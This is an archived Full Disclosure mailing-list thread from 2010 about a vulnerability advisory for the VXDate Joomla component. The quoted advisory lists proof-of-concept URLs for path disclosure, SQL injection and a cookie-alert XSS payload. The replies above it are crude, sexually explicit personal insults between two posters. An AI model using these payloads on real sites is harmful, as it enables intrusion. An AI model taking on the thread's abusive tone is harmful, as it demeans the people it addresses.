Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Re: Vulnerabilities in VXDate for Joomla
From: "Anders Klixbull" <akl () experian dk>
Date: Mon, 22 Mar 2010 14:28:04 +0100

dad? is that you? mom says to stop blowing off strangers for free and
bring home some money!
 
 

________________________________

From: julian steward [mailto:julian.steward09 () gmail com] 
Sent: 22. marts 2010 14:26
To: Anders Klixbull
Cc: full-disclosure () lists grok org uk
Subject: Re: [Full-disclosure] Vulnerabilities in VXDate for Joomla


Yup, and that's pretty much how your born.

Welcome in real life cunt.


On Mon, Mar 22, 2010 at 8:53 AM, Anders Klixbull <akl () experian dk>
wrote:


        yeah sure..
        you junkies are alle the same you suck dicks for cheeseburgers
and crack
         
        
         

________________________________

        
        From: julian steward [mailto:julian.steward09 () gmail com] 
        
        Sent: 22. marts 2010 13:50
        To: Anders Klixbull
        Cc: full-disclosure () lists grok org uk 

        Subject: Re: [Full-disclosure] Vulnerabilities in VXDate for
Joomla
        

        Na only when i need to light up your mom"s crack bang when she's
to fucking high. 
        
        
        On Mon, Mar 22, 2010 at 8:42 AM, Anders Klixbull
<akl () experian dk> wrote:
        

                why does it hurt when you suck lemons?
                does your teeth gets fucked up when you smoke cock all
day?
                 
                
                 

________________________________

                
                From: julian steward [mailto:julian.steward09 () gmail com]

                
                Sent: 22. marts 2010 13:39
                To: Anders Klixbull; full-disclosure () lists grok org uk 

                Subject: Re: [Full-disclosure] Vulnerabilities in VXDate
for Joomla
                

                Yup ur fucking right, as mustdie.
                 
                2 cockmunch for the price of one.
                
                Nice.
                
                
                On Mon, Mar 22, 2010 at 8:36 AM, Anders Klixbull
<akl () experian dk> wrote:
                

                        lol look who's talking about being professional
                        yeah sure because klixbull is such a russian
name right?
                        and oh yeah my email address also ends in .ua
                        julian its time to stop gobbling that cock and
shut the fuck up
                         
                        
                         

________________________________

                        
                        From: full-disclosure-bounces () lists grok org uk
[mailto:full-disclosure-bounces () lists grok org uk] On Behalf Of julian
steward
                        
                        Sent: 22. marts 2010 13:34
                        To: full-disclosure () lists grok org uk >> fdisclo


                        Subject: Re: [Full-disclosure] Vulnerabilities
in VXDate for Joomla
                        

                        Sucking lemon hurts, I don't see why I would
suck one Mr Klixbull
                         
                        Regarding his disclosure, then he shall stfu
about the timeline if he wanna be "professional".
                        
                        Yup Klixbull it's time to close your basement
door and your mounth, or are you too from .ua btw ?
                         

                                 


                                 
                                On Mon, Mar 22, 2010 at 7:41 AM, Anders
Klixbull <akl () experian dk> wrote:
                                

                                bohooo stop crying
                                he can disclose bugs when he feels like
it
                                if you dont like that then go suck a
lemon
                                 
                                
                                 

________________________________

                                From:
full-disclosure-bounces () lists grok org uk
[mailto:full-disclosure-bounces () lists grok org uk] On Behalf Of julian
steward
                                Sent: 22. marts 2010 00:16
                                To: MustLive;
full-disclosure () lists grok org uk
                                Subject: Re: [Full-disclosure]
Vulnerabilities in VXDate for Joomla
                                
                                
                                7 month to inform the dev's, what kind
of asshole are you ?
                                
                                Oh wait, were you hacking some n00bs
website, with your shitty dork ?
                                
                                
                                2010/3/17 MustLive
<mustlive () websecurity com ua>
                                

                                Hello Full-Disclosure!
                                
                                I want to warn you about vulnerabilities
in component VXDate for Joomla.
                                
                                -----------------------------
                                Advisory: Vulnerabilities in VXDate for
Joomla
                                -----------------------------
                                URL: http://websecurity.com.ua/3849/
                                -----------------------------
                                Timeline:
                                
                                10.05.2009 - found the vulnerabilities.
                                12.01.2010 - announced at my site.
                                18.01.2010 - informed developers.
                                13.03.2010 - disclosed at my site.
                                -----------------------------
                                Details:
                                
                                These are Full path disclosure, SQL
Injection and Cross-Site Scripting
                                vulnerabilities.
                                
                                Full path disclosure:
                                
        
http://site/index.php?option=com_vxdate&ct=&apos;
                                
        
http://site/index.php?option=com_vxdate&ct=1&md=details&id=&apos;
                                
        
http://site/index.php?option=com_vxdate&ct=1&md=editform&id=&apos;
                                
                                SQL Injection:
                                
        
http://site/index.php?option=com_vxdate&ct=1&md=details&id=-1%20or%20ver
sion()=5
                                
        
http://site/index.php?option=com_vxdate&ct=1&md=editform&id=-1%20or%20ve
rsion()=5
                                
                                XSS:
                                
        
http://site/index.php?option=com_vxdate&ct=1&md=details&id=%3Cscript%3Ea
lert(document.cookie)%3C/script%3E
                                
        
http://site/index.php?option=com_vxdate&ct=1&md=editform&id=%3Cscript%3E
alert(document.cookie)%3C/script%3E
                                
                                Vulnerable are potentially all versions
of VXDate.
                                
                                Best wishes & regards,
                                MustLive
                                Administrator of Websecurity web site
                                http://websecurity.com.ua
<http://websecurity.com.ua/> 
                                
        
_______________________________________________
                                Full-Disclosure - We believe in it.
                                Charter:
http://lists.grok.org.uk/full-disclosure-charter.html
                                Hosted and sponsored by Secunia -
http://secunia.com/







_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]